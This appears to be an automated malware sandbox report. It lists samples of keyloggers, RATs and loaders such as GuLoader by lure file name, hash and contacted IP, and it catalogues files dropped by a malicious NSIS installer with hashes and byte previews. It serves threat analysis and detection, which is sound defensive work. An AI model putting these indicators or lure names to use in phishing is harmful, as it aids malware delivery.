Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	DHl-Global-Documents.js	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	HUD03ES34ED2025.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Ziraat_Bankasi_Swift_Messaji.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	REQ. NO.237.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	SecuriteInfo.com.MSIL.Kryptik.AIWZ.tr.17983.2263.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DOC0003791175SVD09164420250219PDF(56KB).COM.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	DUE INVOICES #97643592.htm	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SAFEQ Cloud - Secure Print.msi	Get hash	malicious	Unknown	Browse	149.154.167.220
	DHl-Global-Documents.js	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Comprobante transferencia 5678373888272653688262553.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	#U56fe#U7247_20250218.exe	Get hash	malicious	Nitol	Browse	149.154.167.220
	#U56fe#U7247_20250218.exe	Get hash	malicious	Nitol	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	GetPress.exe	Get hash	malicious	Unknown	Browse	142.250.186.46 172.217.16.193
	New Order_List doc.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	142.250.186.46 172.217.16.193
	RFQ March order Ref 28101.exe	Get hash	malicious	GuLoader	Browse	142.250.186.46 172.217.16.193
	KrustyPaperjre.lnk.download.lnk	Get hash	malicious	Unknown	Browse	142.250.186.46 172.217.16.193
	KrustyPaperjre.lnk (2).download.lnk	Get hash	malicious	Unknown	Browse	142.250.186.46 172.217.16.193
	KrustyPaperjre.pdf.lnk.download.lnk	Get hash	malicious	Emmenhtal Loader	Browse	142.250.186.46 172.217.16.193
	KrustyPaperjre.pdf.lnk (2).download.lnk	Get hash	malicious	Emmenhtal Loader	Browse	142.250.186.46 172.217.16.193
	KrustyPaperjre.pdf.lnk (3).download.lnk	Get hash	malicious	Emmenhtal Loader	Browse	142.250.186.46 172.217.16.193
	Quote_2025-0770915101-UAE-25_pdf.exe	Get hash	malicious	GuLoader	Browse	142.250.186.46 172.217.16.193
	77954-668716095406000-20240826160944.pdf.js	Get hash	malicious	Remcos	Browse	142.250.186.46 172.217.16.193

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bikm4whm.q5d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0xxl0c2.l2z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2m2wppz.2ka.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycwkpjgz.5ti.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsgE3F9.tmp

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	data
Category:	dropped
Size (bytes):	1504832
Entropy (8bit):	5.164357621794907
Encrypted:	false
SSDEEP:	12288:yXKKUhsWkv0SzveAnHO02f8VH2rCiI3ShCHu:yXchsWkJrXwf8VaRI3o
MD5:	DD9B80248DDBFF6082522FE72BD4594C
SHA1:	0D5060766CDBD1207F669F4D8D6302B18746A580
SHA-256:	EF9BE3A873AAEADB7F1A0D40781FCD957E035A5749301AB260BBAF0A68DED636
SHA-512:	66351DAFE04B7FDED620E07A2B48FCB23C64C7147C75EF89FD2FC0686D28BF2AD0C950BBC16128BA9B2A0D6676793595386965B706DB8A1118A57C19F420527D
Malicious:	false
Preview:	........,.......,.......D...P...............................................l..............................................................................................................................................................................................................J...a...............j...............................................................................................................................h...............................................................g...............................................................................:.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Bergenserne.dad

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	498513
Entropy (8bit):	1.2594522314890868
Encrypted:	false
SSDEEP:	1536:M09F7nYIVRv0MzwQxMZyKWFRHvcnj3Tlu28Mg3gEU/4QJ1WY1wJdv0iuzvmtdqEg:rzzP/jIBaPFPWP
MD5:	3EFD644CA0CA99A12CAC89E96B991111
SHA1:	D5B29BC0049616E64AE32DDE0E26EE2FD1429E15
SHA-256:	CC2CB844DE8E55CA46B649954DD63B77746C4CF50D423C2EAAC0D569B322CAB3
SHA-512:	5EFE556BCE24BC7F1879B57BA86C72C295A784BA96456FAD105A606D50D909E2CD024CC5E0F9E8BE7295A25E15DCB2D7088072C91C9E794265A92663945227D4
Malicious:	false
Preview:	...............................V............................M..........................................W.................../.............................-..................... ...........`F.......................................A...................................#..................................................................S...............i.......=.........................................%.;............/................................................L............P..........................s...................................................V...................t.......................z................................................................g..............@..................c.......................R.............................................................7...................&.................5......$....................b............................W........................................................~............U.................

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Betoya.jpg

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 498x442, components 3
Category:	dropped
Size (bytes):	24132
Entropy (8bit):	7.949520876471126
Encrypted:	false
SSDEEP:	384:6zJd27IPJGulhKVO001cip1j6WxkKiSN16UTKtjhDVUQY:6TBGulh8O0kjp1+A2aQUT6OT
MD5:	764A59DE161C5464B06951FCB2453720
SHA1:	28E33000F8DC7D4167131D078D76E4B621718FAC
SHA-256:	0AAE5F035BFC205F07345401CED80F12C95EC8E838057D53E89FD1727D2E58A7
SHA-512:	7B024BB62E45369CC7335285926F3D65BB48EF96F4D541155A34AC2887E2EEE375FA842BAB5A8A72AB0CCEC3FDC84BFFA55F5F12215A1AD9F0A4200A616D1F33
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...S.l. ..id.....H..FY.V.6q...5et..L.U.,...+.;.RE...+.b.1............i8..r.K....6..5(.-...Z...V@R..q.J..z .9....I...q.S.{.G.....N...2)\|.....E............=...nprjA...&.W(Ws'.T.GS.......V\|...S....B8<..R.\f.....K.C.d.J]>r..q.i....g(_b.t.]....).t+}.......H.&.l.H.@j.F.5n..(.f..&..(......s.Y...u5..e.}.4...{{&y.G........H.....K...zV.E.<..:8.Nk>q\...-p.(R0

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\combustible.jpg

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 455x347, components 3
Category:	dropped
Size (bytes):	8650
Entropy (8bit):	7.701270895773354
Encrypted:	false
SSDEEP:	192:LeqEhuKzMdPDwRUkdeEQR7vZvg1+cD/f0t3P17PiIPn:qqE/IF2JhGvZY1+E/fy3d7P
MD5:	1126542B10CE8A60B1D710A9809C9FB6
SHA1:	6848980609190984A212B180C0B77AFBFE18058F
SHA-256:	846ABED4EA07CCA15F483C7FE4613E24BC156D3FA87751F0D9A351BBF9D7203B
SHA-512:	447EF36B5D920719D1A652AC8D59C410755BAB8B6840928ADE7CFB280CA4FE2CAFED1921CBA39E736785E9C2CF5EB53BC1DA2691C7A49D39B1918A9387FE21ED
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......[...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...ZL..$)i)s@..Q@..Q@..Q..(.4.......Z)(........R.@.E-%..QE..QE..QE..QE..QI..(...))i(...J.))i(.......E%.......(...i)h........(..4....!.QE.]....(...(.....Z(.(.-..Q.(...(...(...(...(...(...J(.f.(...(...)(.i(...)(......AIKI@...........JZJ..%.P04.R..QE%..QI@.%-%.%....6.(...QE..(...E.P ..(.QE..QE..QE..(...(...(....(....Q@..Q@..Q@.%.P.E.P..(...(....)(.i(...IE...m-%..QE.%.Q@.E.P.IKI@

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\fiberglas.txt

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	648
Entropy (8bit):	4.399438616760771
Encrypted:	false
SSDEEP:	12:HWWhXPNA90RgSp7LY0yFLOBQqfFXu5XHAuELIfVxo8z/nfduzm+CJJq8yn:HR1N20gSRMJFLOPf45XgjkZ/fdcdsyn
MD5:	256832405814ECDD894408AAE07B4A48
SHA1:	CF7EF2FC66543E02061014434CBEAA8E3E3E96DD
SHA-256:	6A6F116157530A277891F23DBBC2E2C2A57038A2E8E9D9BECAF26846EE36125B
SHA-512:	6D82CC8973E83F47185D70432414165B6D5B7A935D115171DC590DB892C23DFAD6267D28AFA13728350675AFFBF50365384BDC06102E1C3A9227BB9276A21DD8
Malicious:	false
Preview:	[mistrusting gusain]..afprvningsstrategis labialize ufreden peridium grundprincip allegroen luftposts eksproprierings,ejermandens parricided sparedes hyldetrs nattetimer skatist bananstikket venskabs doble..stjulempes andelsbankerne dampvaskeri efterbehandlingernes forkene forbrugerpris apprehended injuriesgsmaals peaceless dactylioglyphy,chilcat isolators zealotic ejerformer mngder bogstavere unnegated designmagerne outtire cloister..;kapringers pedicular overgratefully unaskingly.Grovkiks distracts unshyly baggrundsfarve..exemptions kostens kautionsbelbet ridiculousnesses agerhnsejagt forldrerets.Tallowroot steinbock demoraliserings......

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\gribbenes.txt

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	236
Entropy (8bit):	4.328993210012444
Encrypted:	false
SSDEEP:	6:ht2d9vAW/djis/zQ7JYReud10wUj2FaAvv:efr1jiy8J8euQzAvv
MD5:	48DA25E5551E583375BAE6315EC097DD
SHA1:	941EB2709399F97550B437351ECE5C8FC809D3DD
SHA-256:	D030C8FE52FBDBDB24EC70977875421CF49C826D38B939B30591940F339264F5
SHA-512:	BE0E9851DEDE600769AA37356C6D2477F9D97F9F0286A2803361C474C53F18116FBEDBBD6334EADF94DC689DA7B821A35EC55AD62F8A3587EA587B37ED5697FB
Malicious:	false
Preview:	[prsterne sitotoxism]..;ethmonasal steadinesses zincing.Afdragsvis eucharistize poetizes maskinskriverskerne sukkerroerne fortidiges golfklle......Dispunct optimumets ungmernes clocens strappende svejses,kometens precriticism einettes..

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\kultiveringens.txt

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	383
Entropy (8bit):	4.3625531179081944
Encrypted:	false
SSDEEP:	6:hf2IE/HAiJsmcVMEqyMEky/0FTJOExuXE2VaQbFVnlSLzWUAO2W6AUMeSAFbUs/G:hfkgiHcVMIMg06E2nlSfGf6SSAFTFFRc
MD5:	90DFA0E44AB5545B284843C9C1A7D7A1
SHA1:	3858F91B57E03026304DBB5B335C13E28C3E793A
SHA-256:	AE5306E39F2DE7492C4F4C19E34835CB94694D57D0AC680964F58ED18FC3A47D
SHA-512:	9CA6C39D27D08C0E24B9B3D231FDC5E64C76FFD9C182F097FC7448A11B087101A6B9CEB5547720CAC5911679549D0ED62C59C4FDF1706F9D4651A4798DC8B312
Malicious:	false
Preview:	..Wealthier venligsindedes mean undimpled beeblebrox hobbyrums piacular rundskaalen..Antinomiernes rudys veiniest slavic slutakkords,naturligstes storkorsets mastodon postmortuary......lystyachtens bedetppets lakoniskes prutot selv avisudviklingens pomatum bossisms.Inneity hornslet preoccupative legemsvelsernes distrikterne sangbund cutset depressant bjrgningers sanitarium........

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\mostenes.txt

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	372
Entropy (8bit):	4.555889735308426
Encrypted:	false
SSDEEP:	6:G1to8oGURd9EAVMy5TVZtFCsCu2ywJkdyWZvQwhkAnLyedZ5qWk4mAen:LGIYAmy55ZLCsCuOJkdy4IwxnLyedHq3
MD5:	9187BC751CF51B0035A3FC791BC2A79A
SHA1:	005BD9FE16D9B1CC1B8839DB796399317F5B3ED5
SHA-256:	0761D400ADD8935AE71B7C1FB53ABC218DDEC84646344B388645DD499696FCA2
SHA-512:	3B7497F4DF9968744AE5345E7987431973349CDC039C30FCD98D6835A1D500D7E9C892B12920EB3C27D3E9E47D98676808D8352457FBE03909284E0B5D158B3E
Malicious:	false
Preview:	;aversionernes vrelsestypers chromocratic vv socialiser,oer inquisitiveness mrspock..subalgebraically vividialysis exceptionelle galgekranernes sejsingers raller slyngenes.Readvancement ophrendes naadleri marsken cistercienserklosteret resbevisning evanish..[LAURITS UDADVENDTHED]..;tollhall comedic feststemtes olavur,nondisastrous rooflike forhaandsbeskeden klverblade..

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Casziel\pegedes.jpg

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 458x386, components 3
Category:	dropped
Size (bytes):	12615
Entropy (8bit):	7.85749837170779
Encrypted:	false
SSDEEP:	192:LGForl5a66vp75ggWUwF+hZIZfrBIfAXONh5NDVmXzJcM0THNtG+nzUIMAqhVX:K2J5WLg9cZIIfdb/Ew7im+DX
MD5:	B2C62EE0BB702C31D41DE164052B9BBA
SHA1:	DE22A43B1C748D05E16B772DC61C83F08EDA4C6A
SHA-256:	BA30385E0C27CC3DEE77472BE7037F5405C68B06BC67FC0DFD9647B470C697EB
SHA-512:	C00FBD2D1D544C8B7431391FB904FF75A8CDE2479BCC88A2BC36A4EC44EAD05F8BBCD7CCBD9B9E8545D8CA640F03D5EDC4675BA9F7E1F18C9C3605E883FED859
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..N..T..(.....)qF.....R..\P.iqK.\P.qF.;.b...\S....Z\QL...C..p...T.$... ..c.....O>.J2....1.Q..q.ZC'....9...f8..Zs........2..F.. ....-.zR.i.O...H..R...\R......Rc..LQN.&(.(..F(.....LP .....(......e..b.P.QKE.%%:..n(..b.P.qF).b.....Q..n(.Rb...\Q..8..LQ.@A.v(...1F3K.......N..P...R..(....JZ(......(...(.<..)q@..X.+(.....I.Zk.+..>..Y"<....@..'.j....G.Ha.3.Ut..Q..]..'..

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Dentale.txt

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	483
Entropy (8bit):	4.314350541360831
Encrypted:	false
SSDEEP:	12:2p6YLjLssPHHIPrIh+iHepYI0MWHYFP+2TEIynJfZWvJ23IRJy:2pBj4sPHHErIh5HepYrB2TongiCY
MD5:	1377C64CE2A61EEBA2E376F2577E7232
SHA1:	642FD16AAC5F10618424439824DBE424B98A64F3
SHA-256:	40F24ECED8988C3B9A05F709ADD445519405C8492405F66C8A24EE652D43540D
SHA-512:	6D75319CD1234789924BDDE99787F4590B5D01A03FB41E54791379C3FF1DA0BA795C0DD498998ABA4BE23C6F93F5903C41C603838B05CA10BBBB9BB177E1FDF6
Malicious:	false
Preview:	Slvpenge falbeladernes skopudsningens,aandssvageanstalternes mjdet rullet selvfinansieret unnoised souschefs hofterne....Ottomanen allotriophagia ggebgret recommendee specialsymbols vigia byggegrundenes snackbarers haandmadderne anvises..slyngroses fingervanters grafikbillede magthaveres sahib bortsaneringer plussages,nonanalogous definitionsmngdes folkemindeforskerne limbous trillinger poleres histometabasis..Skaan pileworts bowl umbriferous centralvarmeapparaters disse........

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Flekskortet.Ins

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	data
Category:	dropped
Size (bytes):	374480
Entropy (8bit):	7.585744915544338
Encrypted:	false
SSDEEP:	6144:CzXVwSw+bUjVNStWnkv3k3WP4eB1zvCrKAAHnH6+OJG:6XKKUhsWkv0SzveAnHOc
MD5:	DB0E6E3B2A9FAB2DFE4E2B2DC0A21E41
SHA1:	A014853B05BBEAA5C717FA9986C89944B578E280
SHA-256:	22B0465DEBC1D8A9DBD7D7CEEBCC0AC32E303643D9D6A5F1D5AD6FEC2841FAF9
SHA-512:	EBCB0B892073EF93291DEB86F8715FEA13951BEEE6548DA5875000F1A7DC41DC657088823E1602A28E726FD0AA3B174C8C715A018685A849447DD40FABACFD9D
Malicious:	false
Preview:	.................XX......aa..BB.V.QQ...FFF.......,.TTTT.............E....AAAA.........nnn..........Z..........~........YYY............j........?.............\....))............................Q........#........$$...... ...............................&&......`.......h.......................kkkkk...j........................{{{{...........z........................%............/.....................................tt..............5.............}.......M....d.....VV...........--.Y...........)).=........................2..\|\|.................[...........9............r...................................................D..K...*.......~...<.L...B........................................XXXXX......T....i.........BB.I.......................................N..........2222.....;;............g.................W.......(...........i...................;.sss..$............................................................................K......W.............((...............AAA.....iiii...333.............

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Foerstehaandsforklaring\pengehistorien.txt

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	433
Entropy (8bit):	4.398712023354829
Encrypted:	false
SSDEEP:	6:RnW0RySR3SQzEo2tOXKcIcWywEnBYeMxgFZtKHU3F8yycAGXHNEBXX8xCvS:RnW0RdgWwFcCyxngaFTSU3dkkNE7vS
MD5:	7DD1A36F311DC3D03D826F2B10867203
SHA1:	BE6D0114C8DA6B4F1AAD027B1125AD91A3C98507
SHA-256:	9AA03FA35DE2D8DDEA7D1B414F4754541B872268626CE53842DDE0BCCFD8A57A
SHA-512:	447D512E11ADA6A0489C343076F1AA12EE7D2897CD0EE5F4DA60E5AA8D9C9120CD068129BBE9A0FAEECF6EE8ADAE7C311445D359385F8187F94EFE3FBA7D7E76
Malicious:	false
Preview:	......[kampvalgets anaerobious]..harbour malis arkologien udnyttelser tranchere twat consequency.Aminobenzaldehyde indoktrineringen suiting trendy undsig..;cyclistic pigenavn thirteenfold screwbean.Skrdderstillingernes ootocous perpetuations demontere spidsens rosen..marv diskusprolapsers afsket depraveret medisterplses curtalax.Aerometre lonnie janus hagrid redegrendes arvetanter sinuatrial utaknemligstes ferromagnet infighter..

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	794310
Entropy (8bit):	7.730810773728958
Encrypted:	false
SSDEEP:	24576:Taog+LbN+6bOwZNBtbpvaHeB0dtAjXuiyW2Y4:TZgExfvKe2Yui72Y4
MD5:	E9FE3937A3A7C10E6A7554F24DEEA7B0
SHA1:	2A4159954B099847B09ECF3C9A5D874135CC00C0
SHA-256:	550578EFC3220AE7A5C318A0C6F54BFE1BCB48D07A9721851FB383F61BB14996
SHA-512:	B0DCA24ECFEA4B160324BFCEB8B8A1303462ED81C15E18A9779D8426AC6737A16E6F1251B24F0C4638F37DF005DE246250A61BEA9FDC5D402F98E408D5C56322
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....{.W.................^..........+2.......p....@.......................................@.................................(t.......0..(............................................................................p...............................text....].......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc...(....0.......z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\subbeau.jpg

Download File

Process:	C:\Users\user\Desktop\000027_A-000032.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 190x664, components 3
Category:	dropped
Size (bytes):	18249
Entropy (8bit):	7.928684088518816
Encrypted:	false
SSDEEP:	384:KPAMgWdUKGbTRTqmGrrdBDatRIKHnRPmPtWrvw8nmjTu1dF67X:KPHgmU/T9qZB+tRIKHnRPyGtnmXcdF4X
MD5:	6C51B6B3090779E7F128962CE72630D1
SHA1:	48A469663E453022C9137C9C86053C6AB714854C
SHA-256:	4CBCDA201B042E7AC02F5AB219324C39E2FE6F0B444936858A8134EC9EDFC7AA
SHA-512:	1FEBB0BED8684012CBC67D5EF7CC706D761F57C80B10BBA616A67D635AD169B0792628AA0050A7607EEB62A8DDD6035C2B3B99FBC5570CCB9570AF8B81A0BC5C
Malicious:	false
